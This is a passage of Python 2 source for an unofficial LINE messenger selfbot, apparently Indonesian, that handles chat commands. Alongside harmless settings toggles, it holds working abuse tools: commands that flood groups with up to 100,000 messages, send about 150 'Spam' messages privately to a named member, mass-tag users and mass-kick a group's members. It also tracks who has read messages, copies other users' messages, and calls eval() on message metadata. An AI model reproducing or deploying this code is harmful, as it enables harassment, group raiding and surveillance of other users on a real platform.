cancel:" in msg.text: try: strnum = msg.text.replace("Grup cancel:","") if strnum == "off": wait["autoCancel"]["on"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan") else: cl.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim") else: num = int(strnum) wait["autoCancel"]["on"] = True if wait["lang"] == "JP": cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis") else: cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation") except: if wait["lang"] == "JP": cl.sendText(msg.to,"Nilai tidak benar") else: cl.sendText(msg.to,"Weird value") elif msg.text.lower() == 'autoleave on': if wait["leaveRoom"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to on") else: cl.sendText(msg.to,"Auto Leave room already on") else: wait["leaveRoom"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to on") else: cl.sendText(msg.to,"Auto Leave room already on") elif msg.text.lower() == 'autoleave off': if wait["leaveRoom"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to off") else: cl.sendText(msg.to,"Auto Leave room already off") else: wait["leaveRoom"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to off") else: cl.sendText(msg.to,"Auto Leave room already off") elif msg.text.lower() == 'share on': if wait["timeline"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") else: wait["timeline"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") elif msg.text.lower() == 'share off': if wait["timeline"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") else: wait["timeline"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") elif msg.text.lower() == 'status': md = "" if wait["contact"] == True: md+="Contact:on 􀜁􀄯􏿿\n" else: md+="Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="Auto Join:on 􀜁􀄯􏿿\n" else: md +="Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+= "Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="Auto leave:on 􀜁􀄯􏿿\n" else: md+="Auto leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="Share:on 􀜁􀄯􏿿\n" else:md+="Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="Auto add:on 􀜁􀄯􏿿\n" else:md+="Auto add:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="Protect:on 􀜁􀄯􏿿\n" else:md+="Protect:off 􀜁􀄰􏿿\n" if wait["linkprotect"] == True: md+="Link Protect:on 􀜁􀄯􏿿\n" else:md+="Link Protect:off 􀜁􀄰􏿿\n" if wait["inviteprotect"] == True: md+="Invitation Protect:on 􀜁􀄯􏿿\n" else:md+="Invitation Protect:off 􀜁􀄰􏿿\n" if wait["cancelprotect"] == True: md+="Cancel Protect:on 􀜁􀄯􏿿\n" else:md+="Cancel Protect:off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif cms(msg.text,["creator","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"} cl.sendMessage(msg) kk.sendMessage(msg) elif msg.text.lower() == 'autoadd on': if wait["autoAdd"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") else: wait["autoAdd"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") elif msg.text.lower() == 'autoadd off': if wait["autoAdd"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") else: wait["autoAdd"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") elif "Pesan set:" in msg.text: wait["message"] = msg.text.replace("Pesan set:","") cl.sendText(msg.to,"We changed the message") elif msg.text.lower() == 'pesan cek': if wait["lang"] == "JP": cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) else: cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) elif "Come Set:" in msg.text: c = msg.text.replace("Come Set:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah") else: wait["comment"] = c cl.sendText(msg.to,"Ini telah diubah\n\n" + c) elif msg.text in ["Com on","Com:on","Comment on"]: if wait["commentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Aku berada di") else: cl.sendText(msg.to,"To open") else: wait["commentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Comment Actived") else: cl.sendText(msg.to,"Comment Has Been Active") elif msg.text in ["Come off"]: if wait["commentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Hal ini sudah off") else: cl.sendText(msg.to,"It is already turned off") else: wait["commentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Off") else: cl.sendText(msg.to,"To turn off") elif msg.text in ["Com","Comment"]: cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"])) elif msg.text in ["Com Bl"]: wait["wblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist") elif msg.text in ["Com hapus Bl"]: wait["dblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist") elif msg.text in ["Com Bl cek"]: if wait["commentBlack"] == {}: cl.sendText(msg.to,"Nothing in the blacklist") else: cl.sendText(msg.to,"The following is a blacklist") mc = "" for mi_d in wait["commentBlack"]: mc += "・" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text.lower() == 'jam on': if wait["clock"] == True: cl.sendText(msg.to,"Jam already on") else: wait["clock"] = True now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Jam set on") elif msg.text.lower() == 'jam off': if wait["clock"] == False: cl.sendText(msg.to,"Jam already off") else: wait["clock"] = False cl.sendText(msg.to,"Jam set off") elif "Jam say:" in msg.text: n = msg.text.replace("Jam say:","") if len(n.decode("utf-8")) > 30: cl.sendText(msg.to,"terlalu lama") else: wait["cName"] = n cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n) elif msg.text.lower() == 'update': if wait["clock"] == True: now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Diperbarui") else: cl.sendText(msg.to,"Silahkan Aktifkan Jam") elif "Image " in msg.text: search = msg.text.replace("Image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass #========================== FOR COMMAND BOT FINISHED =============================# elif "Spam change:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam change:","") cl.sendText(msg.to,"spam changed") elif "Spam add:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam add:","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam:" in msg.text: if msg.toType == 2: strnum = msg.text.replace("Spam:","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) #===================================== elif "Spam " in msg.text: if msg.toType == 2: bctxt = msg.text.replace("Spam ", "") t = cl.getAllContactIds() t = 500 while(t): cl.sendText(msg.to, (bctxt)) t-=1 #============================================== elif "Spamcontact @" in msg.text: _name = msg.text.replace("Spamcontact @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(msg.to, "Done") print " Spammed !" #==============================================================================# elif msg.text in ["Invite"]: wait["invite"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Steal contact"]: wait["contact"] = True cl.sendText(msg.to,"Send Contact") elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama print "[Command]Like executed" cl.sendText(msg.to,"Like Status Owner") try: likeme() except: pass elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman print "[Command]Like executed" cl.sendText(msg.to,"Like Status Teman") try: likefriend() except: pass elif msg.text in ["Like:on","Like on"]: if wait["likeOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: wait["likeOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Already") elif msg.text in ["Like off","Like:off"]: if wait["likeOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: wait["likeOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Already") elif msg.text in ["Simisimi on","Simisimi:on"]: settings["simiSimi"][msg.to] = True cl.sendText(msg.to,"Simi mode On") elif msg.text in ["Simisimi off","Simisimi:off"]: settings["simiSimi"][msg.to] = False cl.sendText(msg.to,"Simi mode Off") elif msg.text in ["Autoread on","Read:on"]: wait['alwayRead'] = True cl.sendText(msg.to,"Auto read On") elif msg.text in ["Autoread off","Read:off"]: wait['alwayRead'] = False cl.sendText(msg.to,"Auto read Off") elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]: wait["detectMention"] = True cl.sendText(msg.to,"Auto respon tag On") elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]: wait["detectMention"] = False cl.sendText(msg.to,"Auto respon tag Off") elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]: wait["kickMention"] = True cl.sendText(msg.to,"Auto Kick tag ON") elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]: wait["kickMention"] = False cl.sendText(msg.to,"Auto Kick tag OFF") elif "Time" in msg.text: if msg.toType == 2: cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S')) #==============================================================================# elif "Clearall" in msg.text: if msg.toType == 2: if msg.toType == 2: print "ok" _name = msg.text.replace("Clearall","") gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) cl.sendText(msg.to,"Group Cleared.") targets = [] for g in gs.members: if _name in g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Not found.") cl.sendText(msg.to,"Not found.") else: for target in targets: try: klist=[cl,cl,cl] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: cl.sendText(msg.to,"Group cleanse") cl.sendText(msg.to,"Group cleanse") elif ("Kick " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif ("Ulti " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) cl.inviteIntoGroup(msg.to,[target]) cl.cancelGroupInvitation(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif "Kick: " in msg.text: midd = msg.text.replace("Kick: ","") cl.kickoutFromGroup(msg.to,[midd]) elif 'invite ' in msg.text.lower(): key = msg.text[-33:] cl.findAndAddContactsByMid(key) cl.inviteIntoGroup(msg.to, [key]) contact = cl.getContact(key) elif msg.text.lower() == 'cancel': if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: gInviMids = [contact.mid for contact in group.invitee] cl.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") elif msg.text.lower() == 'link on': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = False cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL open") else: cl.sendText(msg.to,"URL open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text.lower() == 'link off': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = True cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL close") else: cl.sendText(msg.to,"URL close") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text in ["Url","Gurl"]: if msg.toType == 2: g = cl.getGroup(msg.to) if g.preventJoinByTicket == True: g.preventJoinByTicket = False cl.updateGroup(g) gurl = cl.reissueGroupTicket(msg.to) cl.sendText(msg.to,"line://ti/g/" + gurl) elif "Gcreator" == msg.text: try: group = cl.getGroup(msg.to) GS = group.creator.mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': GS} cl.sendMessage(M) except: W = group.members[0].mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': W} cl.sendMessage(M) cl.sendText(msg.to,"Creator Grup") elif msg.text.lower() == 'invite:gcreator': if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: gcmid = ginfo.creator.mid except: gcmid = "Error" if wait["lang"] == "JP": cl.inviteIntoGroup(msg.to,[gcmid]) else: cl.inviteIntoGroup(msg.to,[gcmid]) elif ("Gname: " in msg.text): if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Gname: ","") cl.updateGroup(X) elif msg.text.lower() == 'infogrup': group = cl.getGroup(msg.to) try: gCreator = group.creator.displayName except: gCreator = "Error" md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) elif msg.text.lower() == 'grup id': gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[%s]:%s\n" % (cl.getGroup(i).name,i) cl.sendText(msg.to,h) #==============================================================================# elif msg.text in ["Glist"]: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]") cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]") elif msg.text.lower() == 'gcancel': gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"Aku menolak semua undangan") else: cl.sendText(msg.to,"He declined all invitations") elif "Auto add" in msg.text: thisgroup = cl.getGroups([msg.to]) Mids = [contact.mid for contact in thisgroup[0].members] mi_d = Mids[:33] cl.findAndAddContactsByMids(mi_d) cl.sendText(msg.to,"Berhasil add semua") elif "@bye" in msg.text: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: cl.leaveGroup(msg.to) except: pass #==============================================================================# elif "mention" == msg.text.lower(): group = cl.getGroup(msg.to) nama = [contact.mid for contact in group.members] nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama) if jml <= 100: summon(msg.to, nama) if jml > 100 and jml < 200: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, len(nama)-1): nm2 += [nama[j]] summon(msg.to, nm2) if jml > 200 and jml < 500: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, 199): nm2 += [nama[j]] summon(msg.to, nm2) for k in range(200, 299): nm3 += [nama[k]] summon(msg.to, nm3) for l in range(300, 399): nm4 += [nama[l]] summon(msg.to, nm4) for m in range(400, len(nama)-1): nm5 += [nama[m]] summon(msg.to, nm5) if jml > 500: print "Terlalu Banyak Men 500+" cnt = Message() cnt.text = "Jumlah:\n" + str(jml) + " Members" cnt.to = msg.to cl.sendMessage(cnt) elif "setpoint on" == msg.text.lower(): if msg.to in wait2['readPoint']: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to,"Setpoint already on") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S')) print wait2 elif "setpoint off" == msg.text.lower(): if msg.to not in wait2['readPoint']: cl.sendText(msg.to,"Setpoint already off") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass cl.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S')) elif "viewlastseen" == msg.text.lower(): if msg.to in wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: cl.sendText(msg.to, "Reader:\nNone") else: chiya = [] for rom in wait2["ROM"][msg.to].items(): chiya.append(rom[1]) cmem = cl.getContacts(chiya) zx = "" zxc = "" zx2 = [] xpesan = '' for x in range(len(cmem)): xname = str(cmem[x].displayName) pesan = '' pesan2 = pesan+"@a\n" xlen = str(len(zxc)+len(xpesan)) xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1) zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid} zx2.append(zx) zxc += pesan2 msg.contentType = 0 print zxc msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S')) lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')} print lol msg.contentMetadata = lol try: cl.sendMessage(msg) except Exception as error: print error pass else: cl.sendText(msg.to, "Lurking has not been set.") elif "Gbroadcast: " in msg.text: bc = msg.text.replace("Gbroadcast: ","") gid = cl.getGroupIdsJoined() for i in gid: cl.sendText(i, bc) elif "Cbroadcast: " in msg.text: bc = msg.text.replace("Cbroadcast: ","") gid = cl.getAllContactIds() for i in gid: cl.sendText(i, bc) elif "Spam change: " in msg.text: wait["spam"] = msg.text.replace("Spam change: ","") cl.sendText(msg.to,"spam changed") elif "Spam add: " in msg.text: wait["spam"] = msg.text.replace("Spam add: ","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam: " in msg.text: strnum = msg.text.replace("Spam: ","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) else: pass elif "Spam" in msg.text: txt = msg.text.split(" ") jmlh = int(txt[2]) teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","") tulisan = jmlh * (teks+"\n") if txt[1] == "on": if jmlh <= 100000: for x in range(jmlh): cl.sendText(msg.to, teks) else: cl.sendText(msg.to, "Out of Range!") elif txt[1] == "off": if jmlh <= 100000: cl.sendText(msg.to, tulisan) else: cl.sendText(msg.to, "Out Of Range!") elif ("Micadd " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: mimic["target"][target] = True cl.sendText(msg.to,"Target ditambahkan!") break except: cl.sendText(msg.to,"Fail !") break elif ("Micdel " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: del mimic["target"][target] cl.sendText(msg.to,"Target dihapuskan!") break except: cl.sendText(msg.to,"Fail !") break elif msg.text in ["Miclist"]: if mimic["target"] == {}: cl.sendText(msg.to,"nothing") else: mc = "Target mimic user\n" for mi_d in mimic["target"]: mc += "?? "+cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif "Mimic target " in msg.text: if mimic["copy"] == True: siapa = msg.text.replace("Mimic target ","") if siapa.rstrip(' ') == "me": mimic["copy2"] = "me" cl.sendText(msg.to,"Mimic change to me") elif siapa.rstrip(' ') == "target": mimic["copy2"] = "target" cl.sendText(msg.to,"Mimic change to target") else: cl.sendText(msg.to,"I dont know") elif "Mimic " in msg.text: cmd = msg.text.replace("Mimic ","") if cmd == "on": if mimic["status"] == False: mimic["status"] = True cl.sendText(msg.to,"Reply Message on") else: cl.sendText(msg.to,"Sudah on") elif cmd == "off": if mimic["status"] == True: mimic["status"] = False cl.sendText(msg.to,"Reply Message off") else: cl.sendText(msg.to,"Sudah off") elif "Setimage: " in msg.text: wait["pap"] = msg.text.replace("Setimage: ","") cl.sendText(msg.to, "Pap telah di Set") elif msg.text in ["Papimage","Papim","Pap"]: cl.sendImageWithURL(msg.to,wait["pap"]) elif "Setvideo: " in msg.text: wait["pap"] = msg.text.replace("Setvideo: ","") cl.sendText(msg.to,"Video Has Ben Set To") elif msg.text in ["Papvideo","Papvid"]: cl.sendVideoWithURL(msg.to,wait["pap"]) elif "TL:" in msg.text: if msg.toType == 2: tl_text = msg.text.replace("TL:","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) #==============================================================================# elif msg.text.lower() == 'mymid': cl.sendText(msg.to,mid) elif "Timeline: " in msg.text: tl_text = msg.text.replace("Timeline: ","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) elif "Myname: " in msg.text: string = msg.text.replace("Myname: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.displayName = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string + "") elif "Mybio: " in msg.text: string = msg.text.replace("Mybio: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.statusMessage = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string) elif msg.text in ["Myname"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName) elif msg.text in ["Mybio"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage) elif msg.text in ["Mypict"]: h = cl.getContact(mid) 